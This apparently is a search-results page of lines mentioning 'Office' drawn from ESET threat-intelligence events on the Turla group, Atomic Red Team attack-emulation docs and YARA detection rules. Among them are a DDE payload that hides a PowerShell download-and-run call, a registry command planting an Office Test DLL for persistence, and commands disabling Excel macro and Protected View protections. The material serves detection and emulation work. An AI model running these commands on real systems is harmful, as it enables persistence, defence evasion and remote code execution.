malware-ioc misp-turla-lightneuron-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-outlook-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "https://github.com/itsreallynick/office-crackros" © ESET 2014-2018
malware-ioc misp-turla-wateringhole-armenia-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
atomic-red-team Atomic_Friday.md (index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" \| stats values(CommandLine) by Computer MIT License. © 2018 Red Canary
atomic-red-team Office_Macro_COM.md # Office Macro - COM MIT License. © 2018 Red Canary
atomic-red-team index.md - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1137 Office Application Startup CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1137.001 Office Template Macros CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1137.002 Office Test MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Office Apllication Startup Test Persistence [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #18: Disable Microsoft Office Security Features [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Office launching .bat file from AppData [windows] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1137 Office Application Startup CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1137.001 Office Template Macros CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1137.002 Office Test CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #18: Disable Microsoft Office Security Features [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1137 Office Application Startup CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1137.001 Office Template Macros CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1137.002 Office Test MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Office Apllication Startup Test Persistence [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Office launching .bat file from AppData [windows] MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Compromise Software Dependencies and Development Tools CONTRIBUTE A TEST | Cron | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | At (Linux) | Binary Padding | Bash History | Cloud Account CONTRIBUTE A TEST | Internal Spearphishing CONTRIBUTE A TEST | Archive via Custom Method CONTRIBUTE A TEST | Exfiltration Over Alternative Protocol | Bidirectional Communication CONTRIBUTE A TEST | Application or System Exploitation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Office Application Startup CONTRIBUTE A TEST | | Hijack Execution Flow CONTRIBUTE A TEST | Web Portal Capture CONTRIBUTE A TEST | User Activity Based Checks CONTRIBUTE A TEST | | Web Portal Capture CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Office Template Macros CONTRIBUTE A TEST | | Impair Command History Logging | | Virtualization/Sandbox Evasion CONTRIBUTE A TEST | | | | Port Knocking CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Office Test CONTRIBUTE A TEST | | Impair Defenses CONTRIBUTE A TEST | | | | | | Protocol Impersonation CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Compromise Software Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | Accessibility Features | Asynchronous Procedure Call | Bash History | Cloud Account CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Library CONTRIBUTE A TEST | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Commonly Used Port CONTRIBUTE A TEST | Data Destruction | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Office Application Startup CONTRIBUTE A TEST | Port Monitors CONTRIBUTE A TEST | Impair Command History Logging | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Office Template Macros CONTRIBUTE A TEST | Portable Executable Injection CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Office Test | PowerShell Profile | Indicator Blocking | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Office Application Startup CONTRIBUTE A TEST | Path Interception by Search Order Hijacking CONTRIBUTE A TEST | Hidden Window | Unsecured Credentials CONTRIBUTE A TEST | | | | | Web Protocols | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Office Template Macros CONTRIBUTE A TEST | Path Interception by Unquoted Path | Hide Artifacts | Web Portal Capture CONTRIBUTE A TEST | | | | | Web Service CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Office Test | Port Monitors CONTRIBUTE A TEST | Hijack Execution Flow CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1021.003.md Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1055.md Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office MIT License. © 2018 Red Canary
atomic-red-team T1055.md ##### Description: The 64-bit version of Microsoft Office must be installed MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript/JScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md A note regarding this module, due to the way that this module utilizes “ScriptControl” a 64bit version of Microsoft Office is required. MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md ##### Description: The 64-bit version of Microsoft Office must be installed MIT License. © 2018 Red Canary
atomic-red-team T1105.md svchost.exe writing a non-Microsoft Office file to a file with a UNC path. MIT License. © 2018 Red Canary
atomic-red-team T1110.001.md In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) MIT License. © 2018 Red Canary
atomic-red-team T1110.003.md In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md # T1137.002 - Office Test MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md <blockquote>Adversaries may abuse the Microsoft Office “Office Test” Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md There exist user and global Registry keys for the Office Test feature: MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md - Atomic Test #1 - Office Apllication Startup Test Persistence MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md ## Atomic Test #1 - Office Apllication Startup Test Persistence MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md reg add “HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf” /t REG_SZ /d “#{thing_to_execute}” MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md reg delete “HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md - Atomic Test #5 - Office launching .bat file from AppData MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md ## Atomic Test #5 - Office launching .bat file from AppData MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.md Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. MIT License. © 2018 Red Canary
atomic-red-team T1218.md | microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16| MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md 10. DDEAUTO “C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString(‘http:///download.ps1'); # " "Microsoft Document Security Add-On" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md - Atomic Test #18 - Disable Microsoft Office Security Features MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md ## Atomic Test #18 - Disable Microsoft Office Security Features MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” -Name “VBAWarnings” -Value “1” -PropertyType “Dword” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableInternetFilesInPV” -Value “1” -PropertyType “Dword” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableUnsafeLocationsInPV” -Value “1” -PropertyType “Dword” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableAttachementsInPV” -Value “1” -PropertyType “Dword” MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Remove-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” -Name “VBAWarnings” -ErrorAction Ignore | Out-Null MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Remove-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1564.md within the office document itself. An example of this technique can be seen in sample MIT License. © 2018 Red Canary
atomic-red-team T1566.001.md There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.</blockquote> MIT License. © 2018 Red Canary
signature-base apt_apt30_backspace.yar $s19 = “2003 Microsoft Office system” fullword wide CC BY-NC 4.0
signature-base apt_apt30_backspace.yar $s2 = “Microsoft Office Word Plugin Scan” fullword wide CC BY-NC 4.0
signature-base apt_apt30_backspace.yar $s6 = “2003 Microsoft Office system” fullword wide CC BY-NC 4.0
signature-base apt_magichound.yar description = “Detects malicious macro / powershell in Office document” CC BY-NC 4.0
signature-base apt_muddywater.yar $s3 = “*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 O” wide CC BY-NC 4.0
signature-base apt_sednit_delphidownloader.yar $ = “\Interface\Office\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\” fullword ascii CC BY-NC 4.0
signature-base apt_unit78020_malware.yar $a4 = “\Office Start.lnk” fullword wide CC BY-NC 4.0
signature-base apt_volatile_cedar.yar $s17 = “Office Outlook HTTP” fullword ascii CC BY-NC 4.0
signature-base apt_winnti_burning_umbrella.yar $s3 = “Microsoft Office Word” fullword ascii CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x9 = “lnkName=’office 365’; “ fullword ascii CC BY-NC 4.0
signature-base crime_ole_loadswf_cve_2018_4878.yar mitigation0 = “Implement Protected View for Office documents” CC BY-NC 4.0
signature-base crime_ole_loadswf_cve_2018_4878.yar weaponization = “Embedded in Microsoft Office first payloads” CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar reference = “https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about” CC BY-NC 4.0
signature-base exploit_cve_2018_16858.yar description = “RCE in Libre Office with crafted ODT file (CVE-2018-16858)” CC BY-NC 4.0
signature-base exploit_cve_2018_16858.yar and $tag in (0..0100) // <office:doc CC BY-NC 4.0
signature-base general_officemacros.yar description = “Detects an Microsoft Office file that contains the AutoOpen Macro function” CC BY-NC 4.0
signature-base general_officemacros.yar description = “Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)” CC BY-NC 4.0
signature-base general_officemacros.yar $x2 = “0M8R4KGxGuE” ascii // Base64 encoded office header D0CF11E0A1B11AE1.. CC BY-NC 4.0
signature-base generic_anomalies.yar description = “Detects an Office document that was created with a pirated version of MS Office 2007” CC BY-NC 4.0
signature-base generic_anomalies.yar $fp2 = “Office Feature Updates Logon” wide CC BY-NC 4.0
signature-base gen_dde_in_office_docs.yar // YARA rules Office DDE CC BY-NC 4.0
signature-base gen_dde_in_office_docs.yar description = “Detects DDE in MS Office documents” CC BY-NC 4.0
signature-base gen_dde_in_office_docs.yar reference = “https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/” CC BY-NC 4.0
signature-base gen_excel_xll_addin_suspicious.yar reference2=”https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/” CC BY-NC 4.0
signature-base gen_sign_anomalies.yar description = “Detects a suspicious unsigned office software protection platform service binary” CC BY-NC 4.0
signature-base gen_sign_anomalies.yar /* FileDescription Microsoft Office Software Protection Platform Service */ CC BY-NC 4.0
signature-base gen_susp_cmd_var_expansion.yar description = “Detects Office droppers that include a variable expansion string” CC BY-NC 4.0
signature-base gen_susp_office_dropper.yar description = “Detects Office droppers that include a notice to enable active content” CC BY-NC 4.0
signature-base gen_susp_office_dropper.yar description = “Detects suspicious string that asks to enable active content in Office Doc” CC BY-NC 4.0
signature-base gen_susp_office_dropper.yar $a3 = “Microsoft Office Word” fullword ascii CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar // XML Office documents CC BY-NC 4.0

MIT License. Copyright (c) 2020 Strontic.